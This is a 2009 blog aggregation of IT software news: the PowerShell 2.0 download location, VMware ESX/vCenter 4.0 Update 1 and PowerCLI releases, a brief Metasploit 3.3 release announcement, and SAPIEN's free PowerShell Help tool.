For some reason, people are having trouble finding links to the release version of Windows PowerShell 2.0 … I suspect it’s because while it was in CTP, a lot of us bloggers wrote about it and linked to the various CTP downloads … but there aren’t nearly as many posts announcing the release of Windows PowerShell 2.0 as you would expect.
Of course, most of the fault is Microsoft’s, because they buried PowerShell 2 in a knowledge base article with a title that exceeds nondescript, even for Microsoft: Description of the Windows Management Framework on Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. What? Even the Microsoft PowerShell Team Blog never actually wrote a post announcing the PowerShell 2.0 release is available for download but instead wrote about the Windows Management Framework being released.
But in any case, I’m calling on the blogging community to fix the search engines by linking Windows PowerShell and particularly “Windows PowerShell 2.0”: http://support.microsoft.com/kb/968929 to either the Knowledge base article 968929 which has the download links for PowerShell 2.0 for Windows XP, Vista, and Server 2003 and 2008 … or to Microsoft.com/PowerShell which has the latest download links in the side-column on the right hand side.
I can’t fix the search engines on my own, but what was that slogan? Together we can!
vSphere ESX/vCenter 4.0 Update 1
VMware just released ESX 4.0 Update 1 and vCenter 4.0 Update 1. Most people have already reported on this by now. Two things that stood out for me personally are the following:
- HA Cluster Configuration Maximum — HA clusters can now support 160 virtual machines per host in HA Cluster of 8 hosts or less. The maximum number of virtual machines per host in cluster sizes of 9 hosts and above is still 40, allowing a maximum of 1280 Virtual Machines per HA cluster.
- Enhanced Clustering Support for Microsoft Windows – Microsoft Cluster Server (MSCS) for Windows 2000 and 2003 and Windows Server 2008 Failover Clustering is now supported on an VMware High Availability (HA) and Dynamic Resource Scheduler (DRS) cluster in a limited configuration. HA and DRS functionality can be effectively disabled for individual MSCS virtual machines as opposed to disabling HA and DRS on the entire ESX/ESXi host. Refer to the Setup for Failover Clustering and Microsoft Cluster Service guide for additional configuration guidelines.
Especially the first is important as many people have been building non DRS-HA clusters solely for MSCS VMs. As of now this is not needed anymore. You can simply disable DRS and HA via the Cluster properties to make sure your MSCS VMs do not move around. I think Update 1 is an important release for everyone running vSphere at this moment.
Of course you View guys were all waiting for Update 1 to drop:
- VMware View 4.0 support – This release adds support for VMware View 4.0, a solution built specifically for delivering desktops as a managed service from the protocol to the platform.
Full ESX 4.0 U1 Release Notes
Full vCenter 4.0 U1 Release Notes
Something else I noticed… The release notes for ESX talk about “vMotion” where the release notes for vCenter talk about “VMotion”. It seems that VMotion is about to be renamed to vMotion.
Will have to get this up and running on a test server
vSphere PowerCLI Blog: PowerCLI 4.0 U1 is out!
Tonight we released PowerCLI 4.0 U1. This release contains more than 60 new cmdlets as well as greatly improved performance, a new feature to make it easy to manage multiple ESX or vCenter servers from a single window and much, much more. We’ve also put our cmdlet reference online. Watch this space over the next few days for demo videos but in the meantime don’t forget to download and give it a try.
Metasploit 3.3 released!
Get it here!
There are a couple of very cool things in this release. First, there are now standalone installs for Windows and Linux. This is a nice feature in light of some of the recent conflicts between Ruby versions and the framework.
Another feature that I like is the ability to embed Payloads into other .exe files. The OSVDB references are also very nice when it comes to report creating time. NX support in payloads will be a big help.
There is quite a lot to review/take in. Check out the full release notes here.
Be expecting a full review/discussion on our next show!!
All I can say is bring on 3.4 dev!
-strandjs
Powershell Help 2.0 Community Edition
Our Powershell Help tool has been a favorite download for quite some time now. The built-in help command in the Powershell console is helpful if you need just some quick lookup, but for browsing and reading the console just isn’t good enough.
The CHM file Microsoft released is a pretty nice graphical way of getting help for the built-in cmdlets but it’s a closed file and information for third party or even other Microsoft snapins is not available and cannot be added.
Cmdlets organized by popular verbs
This new version of our popular Powershell help tool allows importing any xml help file and about files from other vendors and puts all this combined information on your desktop or notebook. Powershell doesn’t even need to be installed in order to use this.
We have a more detailed QuickGuide available here:
PowerShell Help Quick Guide
You can download this version from here in 32 and 64 bit versions: SAPIEN Community Tools
And yes, it is a Community Tool, so it is free with registration.
Here are some more screenshots:
Showing About files
Hyperlinked “Related Links”
Online Links shown in integrated browser
Search cmdlet help and About articles
Show search results and easily navigate between hits.
Import other help xml files or about articles.
Take notes and keep them associated with each individual help topic.
This entry was posted on Monday, November 16th, 2009 at 1:08 am and is filed under Community Tools, PrimalTools, Software News, Windows PowerShell, Windows Scripting News.







